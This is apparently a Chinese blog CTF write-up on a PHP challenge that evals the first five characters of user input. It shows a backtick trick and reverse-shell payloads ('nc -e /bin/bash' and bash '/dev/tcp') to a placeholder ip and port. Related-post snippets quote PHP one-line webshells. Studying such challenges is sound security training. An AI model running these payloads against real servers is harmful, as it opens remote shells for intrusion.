一道经典的命令执行

最新推荐文章于 2022-07-26 15:00:00 发布
最新推荐文章于 2022-07-26 15:00:00 发布
阅读量306 收藏
点赞数
分类专栏: php 命令执行 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45570082/article/details/108903201
版权

话不多说,附上链接

CTF中的命令执行绕过

涉及到的代码如下

<?php

         highlight_file(__FILE__);

if ($x = @$_GET['x'])
{
                          eval(substr($x, 0, 5));
}

很简单的代码,将我们传入的值取前五位进行eval
payload

?x=`$x`;nc -e /bin/bash ip port
或者
?x= `$x`;bash -i >& /dev/tcp/ip/port 0>&1

大概流程

  1. $x = $_GET[‘x’] //$x= “`$x` ;nc -e /bin/bash ip port”
  2. eval(substr($x,0,5)); //eval(’`$x`’) => exec(’`$x`;nc -e /bin/bash ip port’);
名字被抢的Stars
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf php侧漏,ctf中常见的PHP漏洞小结
weixin_39588252的博客
04-01 1387
ctf中常见的PHP漏洞小结在做ctf题的时候经常会遇到一些PHP代码审计的题目,这里将我遇到过的常见漏洞做一个小结。md5()漏洞PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。常见的payload有QNKCDZO24061070...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
bugkuctf web题的一些write up
qq_44384511的博客
07-24 245
点进去发现是一张图片,先f12查看源代码,直接获得 开始第二题 点进去发现一张图片,要输入图片中计算结果,尝试了一下发现只能输入一位,f12后修改maxlength大于等于2即可 输入答案获得flag ...
CTFSHOW PHP特性篇 (下篇132-150)
羽的博客
10-21 4681
web132 if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x
一句话木马记录
weixin_30418341的博客
12-27 227
1、asp一句话木马: <%eval request(“x”)%> 2、php一句话木马: <?php eval($_POST[g]);?> 3、aspx一句话: <%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%> 4、数据库加密一句话(密码a)...
Perl_截取字符串_substr($string,0,4)
BBka要黑化!
04-20 1万+
Perl_截取字符串_substr($string,0,4)   my $string="123456789"; my $b=substr($string,0,4); print $b; #1234 #0代表起始位置,也就是1,而4代表取多少个。 my $b=substr($string,-10); #表示取序列倒数十个 my $b=substr($string,-9
U盘启动工具和常用命令
10-10
这些工具通常会创建一个包含DOS环境或微型操作系统的启动盘,以便执行磁盘管理和系统恢复任务。 二、DOS命令 DOS(Disk Operating System)是早期个人计算机上广泛使用的操作系统,虽然现在已经被更现代的Windows...
KegeAntiBukkit:防止非操作玩家在命令中使用双点
07-10
KegeAntiBukkit 插件就是针对这一问题应运而生的解决方案,其核心目标是防止非操作玩家在命令中使用双点(":"),从而限制他们的命令执行权限。 首先,我们来深入理解 KegeAntiBukkit 的工作原理。在 Minecraft 中...
generator-stew:做一道美味的炖菜
07-05
开发者在下载并解压后,可以通过运行特定命令(如`npm install`和`yo generator-stew`)来安装和使用这个生成器。 深入探讨,generator-stew可能包括以下关键知识点: 1. **Yeoman框架**:理解Yeoman的工作原理,...
一道shiro反序列化转型引发的思考 .pdf
09-05
文中提到的`exeCmd`方法可能是一个关键点,因为它是唯一调用外部命令的地方,这通常需要特别小心,以防止远程命令执行(RCE)的风险。 业务风控在现代企业安全中扮演着重要角色。它不仅仅是技术层面的问题,更涉及...
职称计算机考试技巧、快捷键及命令汇总.pdf
10-11
1. **确认答题状态**:在完成每一道操作题后,务必检查结果是否被固定为图片,因为通常最终答案会以静态形式呈现。如果界面仍可操作,意味着可能存在未完成的步骤,需要重新检查或继续完成。 2. **时间管理**:考试...
某产品巧妙的命令执行漏洞
一个码农的笔记
03-26 892
最近在做内部产品的代码审计,发现一处有趣的地方,我把关键代码提取出来,供大家学习思路 &lt;? if(array_key_exists('type',$_REQUEST)){ $type = $_REQUEST['type']; } if(array_key_exists('sha1',$_REQUEST)){ $sha1 = $_REQUEST['sha...
CTFshow web入门文件包含
qq_39948058的博客
10-04 2079
前言:看题 web78: if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 发现include是文件包含没错了,伪协议读取出来就可以了 exp:?file=php://filter/convert.base64-encode/resource=flag.php web79: ...
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1830
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow学习记录-web入门(php特性127-136)
龟速更新的九某人
07-26 1305
ctfshow学习记录-web入门(php特性web127-136)
BUUCTF_web部分题解
ro4lsc的博客
04-14 1万+
[极客大挑战 2019]Havefun [CISCN2019 华北赛区 Day2 Web1]Hack World [极客大挑战 2019]Secret File [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [极客大挑战 2019]Http [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]BabySQL [极客大挑战 2019]BuyFlag [ZJCTF 2019]NiZhuanSiWei [ACTF2020 新生赛]Include
基于Linux操作系统的几种反弹Shell方法的总结
W小哥
03-09 955
什么是反弹shell 所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正...
ctf 图片 php_PHP代码审计之CTF系列(1)
weixin_33450988的博客
03-09 985
PHP代码审计之CTF系列(1)采用github yaofeifly师傅的PHP练习。每个内容均采用docker。部署过程:进入对应的docker_env,使用docker-compose builddocker-compose up -d进入对应docker进程,查看地址访问即可。challenge 1访问地址,发现源码1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZg...
运行ddif=/dev/zeroof=/dev/null程序,将程序放到后台暂停。查看后台运行的程序(jobs),并将后台程序调入前台运行,接着放入后台暂停,将该命令在后台继续运行,最后结束该掉命令
最新发布
04-27
好的,我来解释一下这个问题。 这其实是一道关于 Linux 命令的问题。该命令的作用是将/dev/zero的内容写入到/dev/null中,相当于丢弃数据。将该命令放到后台暂停可以使用 Ctrl + Z。查看后台运行的程序可以使用 jobs 命令,将后台程序调入前台运行可以使用 fg 命令。接着放入后台暂停可以使用 Ctrl + Z,将该命令在后台继续运行可以使用 bg 命令。最后结束该掉命令可以使用 kill 命令。 具体的操作步骤如下: 1. 运行命令:`dd if=/dev/zero of=/dev/null`,将其放到后台暂停:`Ctrl + Z`。 2. 查看后台运行的程序:`jobs`,可以看到类似以下输出: ``` [1]+ Stopped dd if=/dev/zero of=/dev/null ``` 3. 将后台程序调入前台运行:`fg %1`,其中 `%1` 表示第一个后台程序的编号。 4. 将该命令在前台暂停:`Ctrl + Z`。 5. 将该命令在后台继续运行:`bg`。 6. 最后结束该命令:`kill %1`,其中 `%1` 表示第一个后台程序的编号。 希望我的回答能够帮到你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值